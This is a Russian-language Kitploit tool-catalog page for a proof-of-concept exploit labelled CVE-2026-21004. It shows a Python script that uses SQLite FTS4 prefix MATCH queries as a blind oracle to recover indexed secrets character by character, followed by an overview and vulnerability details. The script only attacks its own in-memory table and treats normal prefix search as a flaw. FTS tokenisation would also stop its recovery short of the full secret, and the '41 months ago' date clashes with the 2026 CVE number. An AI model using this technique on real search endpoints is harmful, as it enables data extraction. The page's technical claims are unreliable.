Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-21004-SQLite-FTS3-Match-Infoleak-via-Query-Crafting — Эксплойт Proof-of-concept для CVE-2026-21004: использует специально сформированные префиксные запросы MATCH в SQLite FTS3/4 в качестве слепого оракула для посимвольного восстановления индексированных секретных данных. | Kitploit
Инструменты/GitHubGitHub/george0papasotiriou/cve-2026-21004-sqlite-fts3-match-infoleak-via-query-crafting
Анализ уязвимостейЭксплуатацияЭксфильтрация данныхБезопасность Баз Данных
GitHubgeorge0papasotiriou/cve-2026-21004-sqlite-fts3-match-infoleak-via-query-crafting

CVE-2026-21004-SQLite-FTS3-Match-Infoleak-via-Query-Crafting

Эксплойт Proof-of-concept для CVE-2026-21004: использует специально сформированные префиксные запросы MATCH в SQLite FTS3/4 в качестве слепого оракула для посимвольного восстановления индексированных секретных данных.

Репозиторий
41 месяц назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-21004 – Утечка информации через Match-оператор SQLite FTS3 путём конструирования запросов

Программный код (Python)

root@kitploit:~
# sqlite_fts_leak.py - Creates FTS table and exploits match info
import sqlite3

conn = sqlite3.connect(':memory:')
conn.execute("CREATE VIRTUAL TABLE secrets USING fts4(content TEXT)")
conn.execute("INSERT INTO secrets VALUES ('admin:password123')")
conn.execute("INSERT INTO secrets VALUES ('user:secret456')")

# Attacker guesses characters using FTS MATCH with partial matching
def guess_char(prefix, known):
    for c in "abcdefghijklmnopqrstuvwxyz0123456789_:":
        query = f'SELECT * FROM secrets WHERE content MATCH ?'
        # In FTS4, MATCH can leak whether a term exists; we abuse by searching column directly
        try:
            cur = conn.execute(query, (f'"{prefix}{c}*"',))
            if cur.fetchone():
                return c
        except:
            pass
    return None

# Recover the secret character by character
prefix = ""
for _ in range(20):
    c = guess_char(prefix, "")
    if c is None: break
    prefix += c
print(f"Recovered: {prefix}")

CVE-2026-21004 – Утечка информации через Match-оператор SQLite FTS3/4

Severity: High

Обзор

Приложение, использующее SQLite FTS4, предоставляет функцию поиска, возвращающую результаты на основе MATCH-запроса. Наблюдая, происходит ли совпадение (или анализируя различия во времени ответа), злоумышленник может подобрать содержимое полнотекстового индекса посимвольно, извлекая конфиденциальные данные.

Детали уязвимости

  • Тип: Раскрытие информации / слепая инъекция
  • Воздействие: Экфильтрация данных из индексированных столбцов.
  • Первопричина: Оператор FTS MATCH поддерживает префиксные запросы (term*), что позволяет злоумышленнику выполнить словарную атаку, не зная полного термина.

Демонстрация эксплойта

Запустите эксплойт:

root@kitploit:~
python sqlite_fts_leak.py

Скрипт постепенно восстанавливает содержимое таблицы secrets.

Скачать инструмент